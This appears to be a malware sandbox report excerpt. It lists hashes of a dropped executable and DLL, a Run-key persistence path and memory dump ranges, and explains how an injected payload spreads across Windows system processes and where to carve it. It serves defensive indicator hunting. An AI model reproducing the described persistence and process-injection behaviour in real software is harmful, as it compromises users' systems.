C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
  Filesize: 596KB
  MD5: 310e65a59d3c670bc2bededf7ddef03e
  SHA1: 77153c24512610f9ff8e00bf944a9fee8c8f2974
  SHA256: 5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
  SHA512: b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
  (byte-for-byte copy of the submitted sample; this is the file the Run key points at, so hunting on the sample's hashes also finds the persisted copy)

C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup32.dll
  Filesize: 357B
  MD5: 32ea6b0edb3702440a576ab7c1e8f776
  SHA1: 401c6c83e558c08b49ba819e6dc66f07dfa5a21b
  SHA256: 7b102b8219bb1f4bddb398e8e4405811bb5a29afc6b31506dfb83fcc2dcbc455
  SHA512: 2c98beedadbd5d2989944687c575ba8d64db21aa8b406e967153978cc3d19bf3d0378358f4902016a53b11bef3830fd99a884b85ee99d8394a77cc5f3ebe7d68
-
Memory dumps (dump name, address range, size)
memory/776-85     0x0000000000330000-0x000000000035C000   176KB
memory/1112-2     0x0000000000400000-0x0000000000498000   608KB
memory/1112-40    0x0000000000400000-0x0000000000498000   608KB
memory/1112-0     0x00000000005C0000-0x00000000005C6000   24KB
memory/1112-32    0x0000000000400000-0x0000000000498000   608KB
memory/1268-18    0x0000000000680000-0x0000000000686000   24KB
memory/1268-42    0x0000000000400000-0x0000000000498000   608KB
memory/2008-41    0x0000000000400000-0x0000000000498000   608KB
memory/2828-46    0x0000000000900000-0x0000000000901000   4KB
memory/2828-47    0x00000000008A0000-0x00000000008CC000   176KB
memory/2968-50    0x00000000008F0000-0x000000000091C000   176KB
memory/2976-53    0x0000000000300000-0x000000000032C000   176KB
memory/3432-56    0x0000000000B00000-0x0000000000B2C000   176KB
memory/3456-79    0x0000000000B00000-0x0000000000B2C000   176KB
memory/3572-59    0x0000000000140000-0x000000000016C000   176KB
memory/3636-64    0x0000000002890000-0x00000000028BF000   188KB
memory/3636-43    0x0000000000A90000-0x0000000000AFA000   424KB
memory/3636-45    0x0000000000A90000-0x0000000000AFA000   424KB
memory/3636-62    0x0000000002890000-0x00000000028BF000   188KB
memory/3636-63    0x0000000000A90000-0x0000000000AFA000   424KB
memory/3636-66    0x0000000002890000-0x00000000028BF000   188KB
memory/3636-65    0x0000000002890000-0x00000000028BF000   188KB
memory/3748-69    0x0000000000BE0000-0x0000000000C0C000   176KB
memory/3844-71    0x00000000004B0000-0x00000000004DC000   176KB
memory/3856-93    0x00000000003E0000-0x000000000040C000   176KB
memory/3936-74    0x0000000000AD0000-0x0000000000AFC000   176KB
memory/4176-30    0x00007FFC061D0000-0x00007FFC06C91000   10.8MB
memory/4176-29    0x000002A1360A0000-0x000002A1360C2000   136KB
memory/4176-31    0x00007FFC061D0000-0x00007FFC06C91000   10.8MB
memory/4176-19    0x00007FFC061D3000-0x00007FFC061D5000   8KB
memory/4176-39    0x00007FFC061D0000-0x00007FFC06C91000   10.8MB
memory/4368-82    0x0000000000ED0000-0x0000000000EFC000   176KB
memory/4716-90    0x0000000000040000-0x000000000006C000   176KB
memory/5072-8     0x0000000000400000-0x0000000000498000   608KB
memory/5072-7     0x0000000000610000-0x0000000000616000   24KB

Reading the dumps against the process tree: PIDs 1112, 5072, 1268 and 2008 (the sample and its aehup.exe copy) each hold the 608KB image at 0x400000, which is the region to carve for the unpacked executable. The SysWOW64 explorer.exe (PID 3636) holds a 424KB region at 0xA90000 and a 188KB region at 0x2890000. Every system process that PID 3636 wrote into (sihost 2828, svchost 2968 and 3572, taskhostw 2976, Explorer.EXE 3432, DllHost 3748, StartMenuExperienceHost 3844, RuntimeBroker 3936/3456/4368/4716/3856, TextInputHost 776) yields a region of the same 176KB size at a private address, consistent with one injected payload; any one of those dumps is a good candidate for the injected code. The 10.8MB regions in PID 4176 are a mapped module range in the 64-bit powershell.exe, not payload.